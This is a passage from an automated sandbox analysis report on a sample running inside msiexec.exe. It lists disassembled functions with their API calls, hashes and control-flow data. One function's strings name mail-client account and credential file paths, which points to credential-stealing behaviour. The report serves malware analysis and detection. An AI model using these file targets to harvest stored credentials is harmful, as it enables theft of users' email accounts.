                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 50f6786f3ca81f17e0ff532f2c313da3e384ae2b1cbad91a7b551f36a7213104
                                                                    • Instruction ID: 41fe71f86de7baa0e8e911b81c31cd479cbeedc19a76e568c2be27030714fb2d
                                                                    • Opcode Fuzzy Hash: 50f6786f3ca81f17e0ff532f2c313da3e384ae2b1cbad91a7b551f36a7213104
                                                                    • Instruction Fuzzy Hash: 6041A534E00208AFCB11DF6AC840A9EBBB6AF5522CF1881D9D9159B351D735DA05CBB8
                                                                    Function 234B925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 234B9221: _free.LIBCMT ref: 234B924A
                                                                    • _free.LIBCMT ref: 234B92AB
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B92B6
                                                                    • _free.LIBCMT ref: 234B92C1
                                                                    • _free.LIBCMT ref: 234B9315
                                                                    • _free.LIBCMT ref: 234B9320
                                                                    • _free.LIBCMT ref: 234B932B
                                                                    • _free.LIBCMT ref: 234B9336
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction ID: 17c274ae2f198948af8347cc2f7b3dda3259f1ec998335ca6caacf44373e6d45
                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction Fuzzy Hash: 22117231D40708EED974A7B0DC45FCBBBBE9F14B00F404CECA6D976052DA24B5144665
                                                                    Function 234B8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 472 234b8821-234b883a 473 234b883c-234b884c call 234b9341 472->473 474 234b8850-234b8855 472->474 473->474 484 234b884e 473->484 476 234b8862-234b8886 MultiByteToWideChar 474->476 477 234b8857-234b885f 474->477 479 234b8a19-234b8a2c call 234b2ada 476->479 480 234b888c-234b8898 476->480 477->476 481 234b889a-234b88ab 480->481 482 234b88ec 480->482 485 234b88ca-234b88db call 234b56d0 481->485 486 234b88ad-234b88bc call 234bbf20 481->486 488 234b88ee-234b88f0 482->488 484->474 491 234b8a0e 485->491 498 234b88e1 485->498 486->491 497 234b88c2-234b88c8 486->497 488->491 492 234b88f6-234b8909 MultiByteToWideChar 488->492 496 234b8a10-234b8a17 call 234b8801 491->496 492->491 495 234b890f-234b892a call 234b5f19 492->495 495->491 504 234b8930-234b8937 495->504 496->479 502 234b88e7-234b88ea 497->502 498->502 502->488 505 234b8939-234b893e 504->505 506 234b8971-234b897d 504->506 505->496 507 234b8944-234b8946 505->507 508 234b89c9 506->508 509 234b897f-234b8990 506->509 507->491 510 234b894c-234b8966 call 234b5f19 507->510 511 234b89cb-234b89cd 508->511 512 234b89ab-234b89bc call 234b56d0 509->512 513 234b8992-234b89a1 call 234bbf20 509->513 510->496 525 234b896c 510->525 515 234b89cf-234b89e8 call 234b5f19 511->515 516 234b8a07-234b8a0d call 234b8801 511->516 512->516 524 234b89be 512->524 513->516 528 234b89a3-234b89a9 513->528 515->516 530 234b89ea-234b89f1 515->530 516->491 529 234b89c4-234b89c7 524->529 525->491 528->529 529->511 531 234b8a2d-234b8a33 530->531 532 234b89f3-234b89f4 530->532 533 234b89f5-234b8a05 WideCharToMultiByte 531->533 532->533 533->516 534 234b8a35-234b8a3c call 234b8801 533->534 534->496
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,234B6FFD,00000000,?,?,?,234B8A72,?,?,00000100), ref: 234B887B
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,234B8A72,?,?,00000100,5EFC4D8B,?,?), ref: 234B8901
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 234B89FB
                                                                    • __freea.LIBCMT ref: 234B8A08
                                                                      • Part of subcall function 234B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 234B5702
                                                                    • __freea.LIBCMT ref: 234B8A11
                                                                    • __freea.LIBCMT ref: 234B8A36
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: c96876d546bc6eeee25240c722354faeff922279d778f3bbf9902d183d6f542d
                                                                    • Instruction ID: 963c91341b3904baf8933b04c0fa6badfa3ffbfb2699d73c86eb5ad3a20cb502
                                                                    • Opcode Fuzzy Hash: c96876d546bc6eeee25240c722354faeff922279d778f3bbf9902d183d6f542d
                                                                    • Instruction Fuzzy Hash: 7551E372E10286EFDB259E74CC40EAB77BBEB54650F1446E9FD04E6240EB34DC508AB8
                                                                    Function 234B15DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _strlen.LIBCMT ref: 234B1607
                                                                    • _strcat.LIBCMT ref: 234B161D
                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,234B190E,?,?,00000000,?,00000000), ref: 234B1643
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,234B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 234B165A
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,234B190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 234B1661
                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,234B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 234B1686
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                    • String ID:
                                                                    • API String ID: 1922816806-0
                                                                    • Opcode ID: 9da3216b57563bea12272ddee90817977cc167d906efe2242eaf598e022a1ccf
                                                                    • Instruction ID: e4fc07295ecc07659e87a22a72101ebde9c47343c9a16f45ae1db8817b820eba
                                                                    • Opcode Fuzzy Hash: 9da3216b57563bea12272ddee90817977cc167d906efe2242eaf598e022a1ccf
                                                                    • Instruction Fuzzy Hash: AC21C436E00204ABCB149F64DC81AEE77B9EF98614F1444EAE504AB241EE34A54287B9
                                                                    Function 234B1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 234B1038
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 234B104B
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 234B1061
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 234B1075
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 234B1090
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 234B10B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                    • String ID:
                                                                    • API String ID: 3594823470-0
                                                                    • Opcode ID: f79eb83b9a9d5f90546a71ae9a767ffe660b46da6742c359085c47659173081d
                                                                    • Instruction ID: d24f02240aa83be3258c2ab2e8e2af531f9d400f048fba88510a79dd8949b90f
                                                                    • Opcode Fuzzy Hash: f79eb83b9a9d5f90546a71ae9a767ffe660b46da6742c359085c47659173081d
                                                                    • Instruction Fuzzy Hash: 08217136D003189BCF24AF65DC48DDB377AEF44218F1045D6E959971A1DE309A86CB64
                                                                    Function 234B3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,234B3518,234B23F1,234B1F17), ref: 234B3864
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 234B3872
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 234B388B
                                                                    • SetLastError.KERNEL32(00000000,?,234B3518,234B23F1,234B1F17), ref: 234B38DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: cdeecca7093fee91a59683df0902c7fa00d62c0f7b24d46199ad15e03aa44997
                                                                    • Instruction ID: 4590bfc2dee68202c5e903d42ab3899cebfc0174dcea7ebb9770c363148f70a6
                                                                    • Opcode Fuzzy Hash: cdeecca7093fee91a59683df0902c7fa00d62c0f7b24d46199ad15e03aa44997
                                                                    • Instruction Fuzzy Hash: E601B533E0D7115EE214397B6C8495626FBDB35A7D72002FEE110651D5EE1AC801927D
                                                                    Function 234B5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,234B6C6C), ref: 234B5AFA
                                                                    • _free.LIBCMT ref: 234B5B2D
                                                                    • _free.LIBCMT ref: 234B5B55
                                                                    • SetLastError.KERNEL32(00000000,?,?,234B6C6C), ref: 234B5B62
                                                                    • SetLastError.KERNEL32(00000000,?,?,234B6C6C), ref: 234B5B6E
                                                                    • _abort.LIBCMT ref: 234B5B74
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: ff56dee2d78bc923bbeff1805234774b9f95dbd9376059ace12f2629b836820c
                                                                    • Instruction ID: 157f3a265290075eab0a925330134718cd1a0dfd955a0063f89daed9550a1bd0
                                                                    • Opcode Fuzzy Hash: ff56dee2d78bc923bbeff1805234774b9f95dbd9376059ace12f2629b836820c
                                                                    • Instruction Fuzzy Hash: 0FF0A936D086006FD25637356C04E0AE67B9BE5D65B1801D9F924A6281FE288502417C
                                                                    Function 234B11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 234B1E89: lstrlenW.KERNEL32(?,?,?,?,?,234B10DF,?,?,?,00000000), ref: 234B1E9A
                                                                      • Part of subcall function 234B1E89: lstrcatW.KERNEL32(?,?,?,234B10DF,?,?,?,00000000), ref: 234B1EAC
                                                                      • Part of subcall function 234B1E89: lstrlenW.KERNEL32(?,?,234B10DF,?,?,?,00000000), ref: 234B1EB3
                                                                      • Part of subcall function 234B1E89: lstrlenW.KERNEL32(?,?,234B10DF,?,?,?,00000000), ref: 234B1EC8
                                                                      • Part of subcall function 234B1E89: lstrcatW.KERNEL32(?,234B10DF,?,234B10DF,?,?,?,00000000), ref: 234B1ED3
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 234B122A
                                                                      • Part of subcall function 234B173A: _strlen.LIBCMT ref: 234B1855
                                                                      • Part of subcall function 234B173A: _strlen.LIBCMT ref: 234B1869
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                    • API String ID: 4036392271-1520055953
                                                                    • Opcode ID: 5d4c8022e0981fb45327eab84c4a28a4578745905d0e598d7e461d8de038f16c
                                                                    • Instruction ID: 153f2965c232ca08ee1815932543684987cc8cde0f319e4c9bf71978b2e06a66
                                                                    • Opcode Fuzzy Hash: 5d4c8022e0981fb45327eab84c4a28a4578745905d0e598d7e461d8de038f16c
                                                                    • Instruction Fuzzy Hash: 2021A269E103486AE7249694EC81AED733AEF50B14F0015DAF604EB194E6B11982876C
                                                                    Function 234B4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,234B4AEA,?,?,234B4A8A,?,234C2238,0000000C,234B4BBD,00000000,00000000), ref: 234B4B59
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 234B4B6C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,234B4AEA,?,?,234B4A8A,?,234C2238,0000000C,234B4BBD,00000000,00000000,?,234B2082), ref: 234B4B8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: bc424f8e927b480140a714573d84c64c9d0380cace40958cc2f144a1dd4c698f
                                                                    • Instruction ID: 7d12152415e5380a958b37b951c116f7e15fa6883d0a971be20d9a7f952f8dc8
                                                                    • Opcode Fuzzy Hash: bc424f8e927b480140a714573d84c64c9d0380cace40958cc2f144a1dd4c698f
                                                                    • Instruction Fuzzy Hash: AAF0AF31E04208BFCB15AF90C808F9DBFFAEF15365F4001E9EA05A2250EF348941CAA8
                                                                    Function 234B7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 234B715C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 234B717F
                                                                      • Part of subcall function 234B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 234B5702
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 234B71A5
                                                                    • _free.LIBCMT ref: 234B71B8
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 234B71C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 6fd5ec7032c7ec9ce6b287808e55766d022ff179ea51b9237f371304be586c11
                                                                    • Instruction ID: 71e9af63e5605a060b9dbb79eb78e74bac0a62409eb0302c63ca01c811fe44d7
                                                                    • Opcode Fuzzy Hash: 6fd5ec7032c7ec9ce6b287808e55766d022ff179ea51b9237f371304be586c11
                                                                    • Instruction Fuzzy Hash: 40018476E022157FA3112AB64C88D7B6E7FDED6DA431801EEBE04D7340EE648C0281BC
                                                                    Function 234B5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000000,234B636D,234B5713,00000000,?,234B2249,?,?,234B1D66,00000000,?,?,00000000), ref: 234B5B7F
                                                                    • _free.LIBCMT ref: 234B5BB4
                                                                    • _free.LIBCMT ref: 234B5BDB
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B5BE8
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B5BF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: 34491a8ff68383d8dadb13d2e40015e52b2fb43f5721c3bbaf9be4999ffe6f08
                                                                    • Instruction ID: b8bd124ecee295854e85c02b6d5e8c1dbb1ca5dc9a4401f20b6ba4244d3297b1
                                                                    • Opcode Fuzzy Hash: 34491a8ff68383d8dadb13d2e40015e52b2fb43f5721c3bbaf9be4999ffe6f08
                                                                    • Instruction Fuzzy Hash: E301F476E08701AFC31736351C84E1BBABF9BE697471800E9F825A6242EE68C902413C
                                                                    Function 234B1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,234B10DF,?,?,?,00000000), ref: 234B1E9A
                                                                    • lstrcatW.KERNEL32(?,?,?,234B10DF,?,?,?,00000000), ref: 234B1EAC
                                                                    • lstrlenW.KERNEL32(?,?,234B10DF,?,?,?,00000000), ref: 234B1EB3
                                                                    • lstrlenW.KERNEL32(?,?,234B10DF,?,?,?,00000000), ref: 234B1EC8
                                                                    • lstrcatW.KERNEL32(?,234B10DF,?,234B10DF,?,?,?,00000000), ref: 234B1ED3
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat
                                                                    • String ID:
                                                                    • API String ID: 493641738-0
                                                                    • Opcode ID: 59da4ff67337af478759c4bc212a7b218696932394163b407202f621b394952e
                                                                    • Instruction ID: 960104a7b56f4cecaa65696c751b9b6a391f1e674bfe44db6beef4f8663196e4
                                                                    • Opcode Fuzzy Hash: 59da4ff67337af478759c4bc212a7b218696932394163b407202f621b394952e
                                                                    • Instruction Fuzzy Hash: 18F08926900214BBD7253B29AC85E7F777DEFD6A64F04009AFA0893190EB55584292B9
                                                                    Function 234B91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 234B91D0
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B91E2
                                                                    • _free.LIBCMT ref: 234B91F4
                                                                    • _free.LIBCMT ref: 234B9206
                                                                    • _free.LIBCMT ref: 234B9218
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: a0cea8e9f5e8d1f3900c3a8f7e1803776bd5e2885c5eafa0719e18f24daa87c3
                                                                    • Instruction ID: 9e7835ce53a17dab8a33cb8b898f5761906e422cdc93609728a1edabf70caba7
                                                                    • Opcode Fuzzy Hash: a0cea8e9f5e8d1f3900c3a8f7e1803776bd5e2885c5eafa0719e18f24daa87c3
                                                                    • Instruction Fuzzy Hash: DCF06271E152409B8664FB94D5C4C06BBFBEB24714B544CC9F949E7600CF38F8908A7C
                                                                    Function 234B5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 234B536F
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B5381
                                                                    • _free.LIBCMT ref: 234B5394
                                                                    • _free.LIBCMT ref: 234B53A5
                                                                    • _free.LIBCMT ref: 234B53B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: a4022f7cdfe2dace30dbae452f1ced67511af68cc498f0e91f0b8c2cfe13ba1f
                                                                    • Instruction ID: a693ea4993d3710fc35bde5c3ae77b3f87b71bfa61375c2780824b4204f5738e
                                                                    • Opcode Fuzzy Hash: a4022f7cdfe2dace30dbae452f1ced67511af68cc498f0e91f0b8c2cfe13ba1f
                                                                    • Instruction Fuzzy Hash: 1EF05EB0E24220DFC6527F259A804487BF2B73AA287490DCEF810B3351DF3D85128BAD
                                                                    Function 234B4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 234B4C1D
                                                                    • _free.LIBCMT ref: 234B4CE8
                                                                    • _free.LIBCMT ref: 234B4CF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Windows\System32\msiexec.exe
                                                                    • API String ID: 2506810119-1382325751
                                                                    • Opcode ID: eb73fca3784488cf4c805b6bee9f2d7d4f093f7e3673d5cf2afc9439ad240cef
                                                                    • Instruction ID: 6fbff610a6529cf13936dd2b8bd656d974a36aaa80e85ae93f74b786244cae9a
                                                                    • Opcode Fuzzy Hash: eb73fca3784488cf4c805b6bee9f2d7d4f093f7e3673d5cf2afc9439ad240cef
                                                                    • Instruction Fuzzy Hash: B7317771F00318AFDB21EF998880D9EBBFEEBA5B14F5544DAE50497300D6748A41CB78
                                                                    Function 234B86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,234B6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 234B8731
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 234B87BA
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 234B87CC
                                                                    • __freea.LIBCMT ref: 234B87D5
                                                                      • Part of subcall function 234B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 234B5702
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
